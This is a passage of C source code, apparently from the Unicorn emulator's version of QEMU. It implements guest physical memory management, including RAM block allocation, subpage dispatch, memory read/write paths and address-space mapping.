addr - block->offset < block->max_length) { return block; } RAMBLOCK_FOREACH(block) { if (addr - block->offset < block->max_length) { goto found; } } fprintf(stderr, "Bad ram offset %" PRIx64 "\n", (uint64_t)addr); abort(); found: uc->ram_list.mru_block = block; return block; } /* Note: start and end must be within the same ram block. */ bool cpu_physical_memory_test_and_clear_dirty(ram_addr_t start, ram_addr_t length, unsigned client) { return false; } /* Called from RCU critical section */ hwaddr memory_region_section_get_iotlb(CPUState *cpu, MemoryRegionSection *section) { AddressSpaceDispatch *d = flatview_to_dispatch(section->fv); return section - d->map.sections; } static int subpage_register(struct uc_struct *uc, subpage_t *mmio, uint32_t start, uint32_t end, uint16_t section); static subpage_t *subpage_init(struct uc_struct *, FlatView *fv, hwaddr base); static void *(*phys_mem_alloc)(struct uc_struct *uc, size_t size, uint64_t *align) = qemu_anon_ram_alloc; static uint16_t phys_section_add(struct uc_struct *uc, PhysPageMap *map, MemoryRegionSection *section) { /* The physical section number is ORed with a page-aligned * pointer to produce the iotlb entries. Thus it should * never overflow into the page-aligned value. 
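 *
 * A worked example (illustrative numbers): with TARGET_PAGE_BITS == 12,
 * an iotlb value of 0xb003 decodes to page address 0xb000 and section
 * index 3; the assert below keeps the index strictly below
 * TARGET_PAGE_SIZE so the two fields can never collide.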
*/ assert(map->sections_nb < TARGET_PAGE_SIZE); if (map->sections_nb == map->sections_nb_alloc) { map->sections_nb_alloc = MAX(map->sections_nb_alloc * 2, 16); map->sections = g_renew(MemoryRegionSection, map->sections, map->sections_nb_alloc); } map->sections[map->sections_nb] = *section; return map->sections_nb++; } static void phys_section_destroy(MemoryRegion *mr) { bool have_sub_page = mr->subpage; if (have_sub_page) { subpage_t *subpage = container_of(mr, subpage_t, iomem); // object_unref(OBJECT(&subpage->iomem)); g_free(subpage); } } static void phys_sections_free(PhysPageMap *map) { while (map->sections_nb > 0) { MemoryRegionSection *section = &map->sections[--map->sections_nb]; phys_section_destroy(section->mr); } g_free(map->sections); g_free(map->nodes); } static void register_subpage(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section) { AddressSpaceDispatch *d = flatview_to_dispatch(fv); subpage_t *subpage; hwaddr base = section->offset_within_address_space & TARGET_PAGE_MASK; MemoryRegionSection *existing = phys_page_find(d, base); MemoryRegionSection subsection = { .offset_within_address_space = base, .size = int128_make64(TARGET_PAGE_SIZE), }; hwaddr start, end; assert(existing->mr->subpage || existing->mr == &(section->mr->uc->io_mem_unassigned)); if (!(existing->mr->subpage)) { subpage = subpage_init(uc, fv, base); subsection.fv = fv; subsection.mr = &subpage->iomem; phys_page_set(d, base >> TARGET_PAGE_BITS, 1, phys_section_add(uc, &d->map, &subsection)); } else { subpage = container_of(existing->mr, subpage_t, iomem); } start = section->offset_within_address_space & ~TARGET_PAGE_MASK; end = start + int128_get64(section->size) - 1; subpage_register(uc, subpage, start, end, phys_section_add(uc, &d->map, section)); } static void register_multipage(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section) { AddressSpaceDispatch *d = flatview_to_dispatch(fv); hwaddr start_addr = section->offset_within_address_space; uint16_t section_index = phys_section_add(uc, &d->map, section); uint64_t num_pages = int128_get64(int128_rshift(section->size, TARGET_PAGE_BITS)); assert(num_pages); phys_page_set(d, start_addr >> TARGET_PAGE_BITS, num_pages, section_index); } /* * The range in *section* may look like this: * * |s|PPPPPPP|s| * * where s stands for subpage and P for page. 
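 *
 * A worked example (hypothetical addresses, assuming 4 KiB pages): a
 * section covering [0x1800, 0x5800) is dispatched as a leading subpage
 * [0x1800, 0x2000), whole pages [0x2000, 0x5000), and a trailing
 * subpage [0x5000, 0x5800), matching the three register_* calls below.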
*/ void flatview_add_to_dispatch(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section) { MemoryRegionSection remain = *section; Int128 page_size = int128_make64(TARGET_PAGE_SIZE); /* register first subpage */ if (remain.offset_within_address_space & ~TARGET_PAGE_MASK) { uint64_t left = TARGET_PAGE_ALIGN(remain.offset_within_address_space) - remain.offset_within_address_space; MemoryRegionSection now = remain; now.size = int128_min(int128_make64(left), now.size); register_subpage(uc, fv, &now); if (int128_eq(remain.size, now.size)) { return; } remain.size = int128_sub(remain.size, now.size); remain.offset_within_address_space += int128_get64(now.size); remain.offset_within_region += int128_get64(now.size); } /* register whole pages */ if (int128_ge(remain.size, page_size)) { MemoryRegionSection now = remain; now.size = int128_and(now.size, int128_neg(page_size)); register_multipage(uc, fv, &now); if (int128_eq(remain.size, now.size)) { return; } remain.size = int128_sub(remain.size, now.size); remain.offset_within_address_space += int128_get64(now.size); remain.offset_within_region += int128_get64(now.size); } /* register last subpage */ register_subpage(uc, fv, &remain); } static ram_addr_t find_ram_offset_last(struct uc_struct *uc, ram_addr_t size) { RAMBlock *block; ram_addr_t result = 0; RAMBLOCK_FOREACH(block) { result = MAX(block->offset + block->max_length, result); } if (result + size > RAM_ADDR_MAX) { abort(); } return result; } /* Allocate space within the ram_addr_t space that governs the * dirty bitmaps. * Called with the ramlist lock held. */ static ram_addr_t find_ram_offset(struct uc_struct *uc, ram_addr_t size) { RAMBlock *block, *next_block; ram_addr_t offset = RAM_ADDR_MAX, mingap = RAM_ADDR_MAX; assert(size != 0); /* it would hand out same offset multiple times */ if (QLIST_EMPTY_RCU(&uc->ram_list.blocks)) { return 0; } if (!uc->ram_list.freed) { return find_ram_offset_last(uc, size); } RAMBLOCK_FOREACH(block) { ram_addr_t candidate, next = RAM_ADDR_MAX; /* Align blocks to start on a 'long' in the bitmap * which makes the bitmap sync'ing take the fast path. */ candidate = block->offset + block->max_length; candidate = ROUND_UP(candidate, BITS_PER_LONG << TARGET_PAGE_BITS); /* Search for the closest following block * and find the gap. */ RAMBLOCK_FOREACH(next_block) { if (next_block->offset >= candidate) { next = MIN(next, next_block->offset); } } /* If it fits remember our place and remember the size * of gap, but keep going so that we might find a smaller * gap to fill so avoiding fragmentation. */ if (next - candidate >= size && next - candidate < mingap) { offset = candidate; mingap = next - candidate; } } if (offset == RAM_ADDR_MAX) { fprintf(stderr, "Failed to find gap of requested size: %" PRIu64 "\n", (uint64_t)size); abort(); } return offset; } void *qemu_ram_get_host_addr(RAMBlock *rb) { return rb->host; } ram_addr_t qemu_ram_get_offset(RAMBlock *rb) { return rb->offset; } ram_addr_t qemu_ram_get_used_length(RAMBlock *rb) { return rb->used_length; } bool qemu_ram_is_shared(RAMBlock *rb) { return rb->flags & RAM_SHARED; } size_t qemu_ram_pagesize(RAMBlock *rb) { return rb->page_size; } static void ram_block_add(struct uc_struct *uc, RAMBlock *new_block) { RAMBlock *block; RAMBlock *last_block = NULL; new_block->offset = find_ram_offset(uc, new_block->max_length); if (!new_block->host) { new_block->host = phys_mem_alloc(uc, new_block->max_length, &new_block->mr->align); if (!new_block->host) { // mmap fails. 
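// Note: allocation failure is reported through uc->invalid_error rather
// than a return value; qemu_ram_alloc_from_ptr() below resets the field
// before calling ram_block_add() and unwinds if it is still set on return.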
uc->invalid_error = UC_ERR_NOMEM; // error_setg_errno(errp, errno, // "cannot set up guest memory '%s'", // memory_region_name(new_block->mr)); return; } // memory_try_enable_merging(new_block->host, new_block->max_length); } /* Keep the list sorted from biggest to smallest block. Unlike QTAILQ, * QLIST (which has an RCU-friendly variant) does not have insertion at * tail, so save the last element in last_block. */ RAMBLOCK_FOREACH(block) { last_block = block; if (block->max_length < new_block->max_length) { break; } } if (block) { QLIST_INSERT_BEFORE_RCU(block, new_block, next); } else if (last_block) { QLIST_INSERT_AFTER_RCU(last_block, new_block, next); } else { /* list is empty */ QLIST_INSERT_HEAD_RCU(&uc->ram_list.blocks, new_block, next); } uc->ram_list.mru_block = NULL; /* Write list before version */ //smp_wmb(); cpu_physical_memory_set_dirty_range(new_block->offset, new_block->used_length, DIRTY_CLIENTS_ALL); } RAMBlock *qemu_ram_alloc_from_ptr(struct uc_struct *uc, ram_addr_t size, void *host, MemoryRegion *mr) { RAMBlock *new_block; ram_addr_t max_size = size; // Don't resize pre-allocated memory, as it is provided by the user. if (!host) { size = HOST_PAGE_ALIGN(uc, size); max_size = HOST_PAGE_ALIGN(uc, max_size); } new_block = g_malloc0(sizeof(*new_block)); if (new_block == NULL) return NULL; new_block->mr = mr; new_block->used_length = size; new_block->max_length = max_size; assert(max_size >= size); new_block->page_size = uc->qemu_real_host_page_size; new_block->host = host; if (host) { new_block->flags |= RAM_PREALLOC; } uc->invalid_error = UC_ERR_OK; ram_block_add(mr->uc, new_block); if (uc->invalid_error != UC_ERR_OK) { g_free(new_block); return NULL; } return new_block; } RAMBlock *qemu_ram_alloc(struct uc_struct *uc, ram_addr_t size, MemoryRegion *mr) { return qemu_ram_alloc_from_ptr(uc, size, NULL, mr); } static void reclaim_ramblock(struct uc_struct *uc, RAMBlock *block) { if (block->flags & RAM_PREALLOC) { ; } else if (false) { } else { qemu_anon_ram_free(uc, block->host, block->max_length); } g_free(block); } void qemu_ram_free(struct uc_struct *uc, RAMBlock *block) { if (!block) { return; } //if (block->host) { // ram_block_notify_remove(block->host, block->max_length); //} QLIST_REMOVE_RCU(block, next); uc->ram_list.mru_block = NULL; uc->ram_list.freed = true; /* Write list before version */ //smp_wmb(); // call_rcu(block, reclaim_ramblock, rcu); reclaim_ramblock(uc, block); } /* Return a host pointer to ram allocated with qemu_ram_alloc. * This should not be used for general purpose DMA. Use address_space_map * or address_space_rw instead. For local memory (e.g. video ram) that the * device owns, use memory_region_get_ram_ptr. * * Called within RCU critical section. */ void *qemu_map_ram_ptr(struct uc_struct *uc, RAMBlock *ram_block, ram_addr_t addr) { RAMBlock *block = ram_block; if (block == NULL) { block = qemu_get_ram_block(uc, addr); addr -= block->offset; } return ramblock_ptr(block, addr); } /* Return a host pointer to guest's ram. Similar to qemu_map_ram_ptr * but takes a size argument. * * Called within RCU critical section.
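 *
 * Usage sketch (hypothetical caller, mirroring flatview_read_continue
 * further down): pass the desired length in *size and use the possibly
 * clamped value on return:
 *
 *     hwaddr l = len;
 *     uint8_t *p = qemu_ram_ptr_length(uc, mr->ram_block, addr1, &l, false);
 *     memcpy(buf, p, l);   // l may have shrunk to the block boundary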
*/ static void *qemu_ram_ptr_length(struct uc_struct *uc, RAMBlock *ram_block, ram_addr_t addr, hwaddr *size, bool lock) { RAMBlock *block = ram_block; if (*size == 0) { return NULL; } if (block == NULL) { block = qemu_get_ram_block(uc, addr); addr -= block->offset; } *size = MIN(*size, block->max_length - addr); return ramblock_ptr(block, addr); } /* Return the offset of a host pointer within a RAMBlock */ ram_addr_t qemu_ram_block_host_offset(RAMBlock *rb, void *host) { ram_addr_t res = (uint8_t *)host - (uint8_t *)rb->host; assert((uintptr_t)host >= (uintptr_t)rb->host); assert(res < rb->max_length); return res; } /* * Translates a host ptr back to a RAMBlock, a ram_addr and an offset * in that RAMBlock. * * ptr: Host pointer to look up * round_offset: If true round the result offset down to a page boundary * *ram_addr: set to result ram_addr * *offset: set to result offset within the RAMBlock * * Returns: RAMBlock (or NULL if not found) * * By the time this function returns, the returned pointer is not protected * by RCU anymore. If the caller is not within an RCU critical section and * does not hold the iothread lock, it must have other means of protecting the * pointer, such as a reference to the region that includes the incoming * ram_addr_t. */ RAMBlock *qemu_ram_block_from_host(struct uc_struct *uc, void *ptr, bool round_offset, ram_addr_t *offset) { RAMBlock *block; uint8_t *host = ptr; block = uc->ram_list.mru_block; if (block && block->host && host - block->host < block->max_length) { goto found; } RAMBLOCK_FOREACH(block) { /* This case happens when the block is not mapped. */ if (block->host == NULL) { continue; } if (host - block->host < block->max_length) { goto found; } } return NULL; found: *offset = (host - block->host); if (round_offset) { *offset &= TARGET_PAGE_MASK; } return block; } /* Some of the softmmu routines need to translate from a host pointer (typically a TLB entry) back to a ram offset. */ ram_addr_t qemu_ram_addr_from_host(struct uc_struct *uc, void *ptr) { RAMBlock *block; ram_addr_t offset; block = qemu_ram_block_from_host(uc, ptr, false, &offset); if (!block) { return RAM_ADDR_INVALID; } return block->offset + offset; } /* Generate a debug exception if a watchpoint has been hit.
*/ void cpu_check_watchpoint(CPUState *cpu, vaddr addr, vaddr len, MemTxAttrs attrs, int flags, uintptr_t ra) { } static MemTxResult flatview_read(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len); static MemTxResult flatview_write(struct uc_struct *, FlatView *fv, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len); static bool flatview_access_valid(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr len, bool is_write, MemTxAttrs attrs); static MemTxResult subpage_read(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t *data, unsigned len, MemTxAttrs attrs) { subpage_t *subpage = opaque; uint8_t buf[8]; MemTxResult res; #if defined(DEBUG_SUBPAGE) printf("%s: subpage %p len %u addr " TARGET_FMT_plx "\n", __func__, subpage, len, addr); #endif res = flatview_read(uc, subpage->fv, addr + subpage->base, attrs, buf, len); if (res) { return res; } *data = ldn_p(buf, len); return MEMTX_OK; } static MemTxResult subpage_write(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t value, unsigned len, MemTxAttrs attrs) { subpage_t *subpage = opaque; uint8_t buf[8]; #if defined(DEBUG_SUBPAGE) printf("%s: subpage %p len %u addr " TARGET_FMT_plx " value %"PRIx64"\n", __func__, subpage, len, addr, value); #endif stn_p(buf, len, value); return flatview_write(uc, subpage->fv, addr + subpage->base, attrs, buf, len); } static bool subpage_accepts(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned len, bool is_write, MemTxAttrs attrs) { subpage_t *subpage = opaque; #if defined(DEBUG_SUBPAGE) printf("%s: subpage %p %c len %u addr " TARGET_FMT_plx "\n", __func__, subpage, is_write ? 'w' : 'r', len, addr); #endif return flatview_access_valid(uc, subpage->fv, addr + subpage->base, len, is_write, attrs); } static const MemoryRegionOps subpage_ops = { .read_with_attrs = subpage_read, .write_with_attrs = subpage_write, .impl.min_access_size = 1, .impl.max_access_size = 8, .valid.min_access_size = 1, .valid.max_access_size = 8, .valid.accepts = subpage_accepts, .endianness = DEVICE_NATIVE_ENDIAN, }; static int subpage_register(struct uc_struct *uc, subpage_t *mmio, uint32_t start, uint32_t end, uint16_t section) { int idx, eidx; if (start >= TARGET_PAGE_SIZE || end >= TARGET_PAGE_SIZE) return -1; idx = SUBPAGE_IDX(start); eidx = SUBPAGE_IDX(end); #if defined(DEBUG_SUBPAGE) printf("%s: %p start %08x end %08x idx %08x eidx %08x section %d\n", __func__, mmio, start, end, idx, eidx, section); #endif for (; idx <= eidx; idx++) { mmio->sub_section[idx] = section; } return 0; } static subpage_t *subpage_init(struct uc_struct *uc, FlatView *fv, hwaddr base) { subpage_t *mmio; /* mmio->sub_section is set to PHYS_SECTION_UNASSIGNED with g_malloc0 */ mmio = g_malloc0(sizeof(subpage_t) + TARGET_PAGE_SIZE * sizeof(uint16_t)); mmio->fv = fv; mmio->base = base; memory_region_init_io(fv->root->uc, &mmio->iomem, &subpage_ops, mmio, TARGET_PAGE_SIZE); mmio->iomem.subpage = true; #if defined(DEBUG_SUBPAGE) printf("%s: %p base " TARGET_FMT_plx " len %08x\n", __func__, mmio, base, TARGET_PAGE_SIZE); #endif return mmio; } static uint16_t dummy_section(struct uc_struct *uc, PhysPageMap *map, FlatView *fv, MemoryRegion *mr) { assert(fv); MemoryRegionSection section = { .fv = fv, .mr = mr, .offset_within_address_space = 0, .offset_within_region = 0, .size = int128_2_64(), }; return phys_section_add(uc, map, &section); } MemoryRegionSection *iotlb_to_section(CPUState *cpu, hwaddr index, MemTxAttrs attrs) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif int asidx =
cpu_asidx_from_attrs(cpu, attrs); CPUAddressSpace *cpuas = &cpu->cpu_ases[asidx]; AddressSpaceDispatch *d = cpuas->memory_dispatch; MemoryRegionSection *sections = d->map.sections; return &sections[index & ~TARGET_PAGE_MASK]; } static void io_mem_init(struct uc_struct *uc) { memory_region_init_io(uc, &uc->io_mem_unassigned, &unassigned_mem_ops, NULL, UINT64_MAX); } AddressSpaceDispatch *address_space_dispatch_new(struct uc_struct *uc, FlatView *fv) { AddressSpaceDispatch *d = g_new0(AddressSpaceDispatch, 1); #ifndef NDEBUG uint16_t n; n = dummy_section(uc, &d->map, fv, &(uc->io_mem_unassigned)); assert(n == PHYS_SECTION_UNASSIGNED); #else dummy_section(uc, &d->map, fv, &(uc->io_mem_unassigned)); #endif d->phys_map = (PhysPageEntry) { .ptr = PHYS_MAP_NODE_NIL, .skip = 1 }; d->uc = uc; return d; } void address_space_dispatch_free(AddressSpaceDispatch *d) { phys_sections_free(&d->map); g_free(d); } static void tcg_commit(MemoryListener *listener) { CPUAddressSpace *cpuas; AddressSpaceDispatch *d; /* since each CPU stores ram addresses in its TLB cache, we must reset the modified entries */ cpuas = container_of(listener, CPUAddressSpace, tcg_as_listener); cpu_reloading_memory_map(); /* The CPU and TLB are protected by the iothread lock. * We reload the dispatch pointer now because cpu_reloading_memory_map() * may have split the RCU critical section. */ d = address_space_to_dispatch(cpuas->as); cpuas->memory_dispatch = d; tlb_flush(cpuas->cpu); } static uint64_t unassigned_io_read(struct uc_struct *uc, void* opaque, hwaddr addr, unsigned size) { #ifdef _MSC_VER return (uint64_t)0xffffffffffffffffULL; #else return (uint64_t)-1ULL; #endif } static void unassigned_io_write(struct uc_struct *uc, void* opaque, hwaddr addr, uint64_t data, unsigned size) { } static const MemoryRegionOps unassigned_io_ops = { .read = unassigned_io_read, .write = unassigned_io_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static void memory_map_init(struct uc_struct *uc) { uc->system_memory = g_malloc(sizeof(*(uc->system_memory))); memory_region_init(uc, uc->system_memory, UINT64_MAX); address_space_init(uc, &uc->address_space_memory, uc->system_memory); uc->system_io = g_malloc(sizeof(*(uc->system_io))); memory_region_init_io(uc, uc->system_io, &unassigned_io_ops, NULL, 65536); address_space_init(uc, &uc->address_space_io, uc->system_io); } /* physical memory access (slow version, mainly for debug) */ static void invalidate_and_set_dirty(MemoryRegion *mr, hwaddr addr, hwaddr length) { } static int memory_access_size(MemoryRegion *mr, unsigned l, hwaddr addr) { unsigned access_size_max = mr->ops->valid.max_access_size; /* Regions are assumed to support 1-4 byte accesses unless otherwise specified. */ if (access_size_max == 0) { access_size_max = 4; } /* Bound the maximum access by the alignment of the address. */ if (!mr->ops->impl.unaligned) { #ifdef _MSC_VER unsigned align_size_max = addr & (0ULL - addr); #else unsigned align_size_max = addr & -addr; #endif if (align_size_max != 0 && align_size_max < access_size_max) { access_size_max = align_size_max; } } /* Don't attempt accesses larger than the maximum. */ if (l > access_size_max) { l = access_size_max; } l = pow2floor(l); return l; } static bool prepare_mmio_access(MemoryRegion *mr) { return true; } /* Called within RCU critical section.
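 *
 * The loop below alternates between MMIO dispatch and direct RAM memcpy.
 * An illustrative case: an 8-byte MMIO write to an address with only
 * 4-byte alignment is split in two, because memory_access_size() above
 * bounds each access by addr & -addr (the lowest set bit of the address).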
*/ static MemTxResult flatview_write_continue(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, const void *ptr, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion *mr) { uint8_t *ram_ptr; uint64_t val; MemTxResult result = MEMTX_OK; bool release_lock = false; const uint8_t *buf = ptr; for (;;) { if (!memory_access_is_direct(mr, true)) { release_lock |= prepare_mmio_access(mr); l = memory_access_size(mr, l, addr1); /* XXX: could force current_cpu to NULL to avoid potential bugs */ val = ldn_he_p(buf, l); result |= memory_region_dispatch_write(uc, mr, addr1, val, size_memop(l), attrs); } else { /* RAM case */ ram_ptr = qemu_ram_ptr_length(fv->root->uc, mr->ram_block, addr1, &l, false); memcpy(ram_ptr, buf, l); } if (release_lock) { release_lock = false; } len -= l; buf += l; addr += l; if (!len) { break; } l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, true, attrs); } return result; } /* Called from RCU critical section. */ static MemTxResult flatview_write(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len) { hwaddr l; hwaddr addr1; MemoryRegion *mr; MemTxResult result = MEMTX_OK; l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, true, attrs); result = flatview_write_continue(uc, fv, addr, attrs, buf, len, addr1, l, mr); return result; } /* Called within RCU critical section. */ MemTxResult flatview_read_continue(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *ptr, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion *mr) { uint8_t *ram_ptr; uint64_t val; MemTxResult result = MEMTX_OK; bool release_lock = false; uint8_t *buf = ptr; for (;;) { if (!memory_access_is_direct(mr, false)) { /* I/O case */ release_lock |= prepare_mmio_access(mr); l = memory_access_size(mr, l, addr1); result |= memory_region_dispatch_read(uc, mr, addr1, &val, size_memop(l), attrs); stn_he_p(buf, l, val); } else { /* RAM case */ ram_ptr = qemu_ram_ptr_length(fv->root->uc, mr->ram_block, addr1, &l, false); memcpy(buf, ram_ptr, l); } if (release_lock) { release_lock = false; } len -= l; buf += l; addr += l; if (!len) { break; } l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, false, attrs); } return result; } /* Called from RCU critical section. 
*/ static MemTxResult flatview_read(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len) { hwaddr l; hwaddr addr1; MemoryRegion *mr; l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, false, attrs); return flatview_read_continue(uc, fv, addr, attrs, buf, len, addr1, l, mr); } MemTxResult address_space_read_full(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len) { MemTxResult result = MEMTX_OK; FlatView *fv; if (len > 0) { fv = address_space_to_flatview(as); result = flatview_read(as->uc, fv, addr, attrs, buf, len); } return result; } MemTxResult address_space_write(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len) { MemTxResult result = MEMTX_OK; FlatView *fv; if (len > 0) { fv = address_space_to_flatview(as); result = flatview_write(as->uc, fv, addr, attrs, buf, len); } return result; } MemTxResult address_space_rw(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len, bool is_write) { if (is_write) { return address_space_write(as, addr, attrs, buf, len); } else { return address_space_read_full(as, addr, attrs, buf, len); } } bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, void *buf, hwaddr len, bool is_write) { MemTxResult result = address_space_rw(as, addr, MEMTXATTRS_UNSPECIFIED, buf, len, is_write); if (result == MEMTX_OK) { return true; } else { return false; } } enum write_rom_type { WRITE_DATA, FLUSH_CACHE, }; static inline MemTxResult address_space_write_rom_internal(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *ptr, hwaddr len, enum write_rom_type type) { hwaddr l; uint8_t *ram_ptr; hwaddr addr1; MemoryRegion *mr; const uint8_t *buf = ptr; while (len > 0) { l = len; mr = address_space_translate(as, addr, &addr1, &l, true, attrs); if (!memory_region_is_ram(mr)) { l = memory_access_size(mr, l, addr1); } else { /* ROM/RAM case */ ram_ptr = qemu_map_ram_ptr(as->uc, mr->ram_block, addr1); switch (type) { case WRITE_DATA: memcpy(ram_ptr, buf, l); break; case FLUSH_CACHE: flush_icache_range((uintptr_t)ram_ptr, (uintptr_t)ram_ptr + l); break; } } len -= l; buf += l; addr += l; } return MEMTX_OK; } /* used for ROM loading : can write in RAM and ROM */ MemTxResult address_space_write_rom(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len) { return address_space_write_rom_internal(as, addr, attrs, buf, len, WRITE_DATA); } void cpu_flush_icache_range(AddressSpace *as, hwaddr start, hwaddr len) { } void cpu_exec_init_all(struct uc_struct *uc) { /* The data structures we set up here depend on knowing the page size, * so no more changes can be made after this point. * In an ideal world, nothing we did before we had finished the * machine setup would care about the target page size, and we could * do this much later, rather than requiring board models to state * up front what their requirements are. 
*/ finalize_target_page_bits(uc); memory_map_init(uc); io_mem_init(uc); } static bool flatview_access_valid(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr len, bool is_write, MemTxAttrs attrs) { MemoryRegion *mr; hwaddr l, xlat; while (len > 0) { l = len; mr = flatview_translate(uc, fv, addr, &xlat, &l, is_write, attrs); if (!memory_access_is_direct(mr, is_write)) { l = memory_access_size(mr, l, addr); if (!memory_region_access_valid(uc, mr, xlat, l, is_write, attrs)) { return false; } } len -= l; addr += l; } return true; } bool address_space_access_valid(AddressSpace *as, hwaddr addr, hwaddr len, bool is_write, MemTxAttrs attrs) { FlatView *fv; bool result; fv = address_space_to_flatview(as); result = flatview_access_valid(as->uc, fv, addr, len, is_write, attrs); return result; } static hwaddr flatview_extend_translation(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr target_len, MemoryRegion *mr, hwaddr base, hwaddr len, bool is_write, MemTxAttrs attrs) { hwaddr done = 0; hwaddr xlat; MemoryRegion *this_mr; for (;;) { target_len -= len; addr += len; done += len; if (target_len == 0) { return done; } len = target_len; this_mr = flatview_translate(uc, fv, addr, &xlat, &len, is_write, attrs); if (this_mr != mr || xlat != base + done) { return done; } } } /* Map a physical memory region into a host virtual address. * May map a subset of the requested range, given by and returned in *plen. * May return NULL if resources needed to perform the mapping are exhausted. * Use only for reads OR writes - not for read-modify-write operations. * Use cpu_register_map_client() to know when retrying the map operation is * likely to succeed. */ void *address_space_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write, MemTxAttrs attrs) { hwaddr len = *plen; hwaddr l, xlat; MemoryRegion *mr; void *ptr; FlatView *fv; struct uc_struct *uc = as->uc; if (len == 0) { return NULL; } l = len; fv = address_space_to_flatview(as); mr = flatview_translate(uc, fv, addr, &xlat, &l, is_write, attrs); if (!memory_access_is_direct(mr, is_write)) { /* Avoid unbounded allocations */ l = MIN(l, TARGET_PAGE_SIZE); mr->uc->bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l); mr->uc->bounce.addr = addr; mr->uc->bounce.len = l; mr->uc->bounce.mr = mr; if (!is_write) { flatview_read(as->uc, fv, addr, MEMTXATTRS_UNSPECIFIED, mr->uc->bounce.buffer, l); } *plen = l; return mr->uc->bounce.buffer; } *plen = flatview_extend_translation(as->uc, fv, addr, len, mr, xlat, l, is_write, attrs); ptr = qemu_ram_ptr_length(as->uc, mr->ram_block, xlat, plen, true); return ptr; } /* Unmaps a memory region previously mapped by address_space_map(). * Will also mark the memory as dirty if is_write is true. access_len gives * the amount of memory that was actually read or written by the caller. 
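 *
 * Typical paired usage (a sketch with hypothetical names):
 *
 *     hwaddr plen = len;
 *     void *p = address_space_map(as, addr, &plen, true, attrs);
 *     if (p) {
 *         ... fill up to plen bytes at p ...
 *         address_space_unmap(as, p, plen, true, plen);
 *     }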
*/ void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len) { if (buffer != as->uc->bounce.buffer) { MemoryRegion *mr; ram_addr_t addr1; mr = memory_region_from_host(as->uc, buffer, &addr1); assert(mr != NULL); if (is_write) { invalidate_and_set_dirty(mr, addr1, access_len); } return; } if (is_write) { address_space_write(as, as->uc->bounce.addr, MEMTXATTRS_UNSPECIFIED, as->uc->bounce.buffer, access_len); } qemu_vfree(as->uc->bounce.buffer); as->uc->bounce.buffer = NULL; } void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write) { return address_space_map(as, addr, plen, is_write, MEMTXATTRS_UNSPECIFIED); } void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len) { address_space_unmap(as, buffer, len, is_write, access_len); } #define ARG1_DECL AddressSpace *as #define ARG1 as #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define TRANSLATE(...) address_space_translate(as, __VA_ARGS__) #include "memory_ldst.inc.c" /* Called from RCU critical section. This function has the same * semantics as address_space_translate, but it only works on a * predefined range of a MemoryRegion that was mapped with * address_space_cache_init. */ static inline MemoryRegion *address_space_translate_cached( MemoryRegionCache *cache, hwaddr addr, hwaddr *xlat, hwaddr *plen, bool is_write, MemTxAttrs attrs) { MemoryRegionSection section; MemoryRegion *mr; IOMMUMemoryRegion *iommu_mr; AddressSpace *target_as; assert(!cache->ptr); *xlat = addr + cache->xlat; mr = cache->mrs.mr; iommu_mr = memory_region_get_iommu(mr); if (!iommu_mr) { /* MMIO region. */ return mr; } section = address_space_translate_iommu(iommu_mr, xlat, plen, NULL, is_write, true, &target_as, attrs); return section.mr; } #define ARG1_DECL MemoryRegionCache *cache #define ARG1 cache #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached_slow, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached_slow #endif #define TRANSLATE(...) address_space_translate_cached(cache, __VA_ARGS__) #include "memory_ldst.inc.c" /* virtual memory access for debug (includes writing to ROM) */ int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, void *ptr, target_ulong len, bool is_write) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif hwaddr phys_addr; target_ulong l, page; uint8_t *buf = ptr; while (len > 0) { int asidx; MemTxAttrs attrs; page = addr & TARGET_PAGE_MASK; phys_addr = cpu_get_phys_page_attrs_debug(cpu, page, &attrs); asidx = cpu_asidx_from_attrs(cpu, attrs); /* if no physical page mapped, return an error */ if (phys_addr == -1) return -1; l = (page + TARGET_PAGE_SIZE) - addr; if (l > len) l = len; phys_addr += (addr & ~TARGET_PAGE_MASK); if (is_write) { address_space_write_rom(cpu->cpu_ases[asidx].as, phys_addr, attrs, buf, l); } else { address_space_read(cpu->cpu_ases[asidx].as, phys_addr, attrs, buf, l); } len -= l; buf += l; addr += l; } return 0; } /* * Allows code that 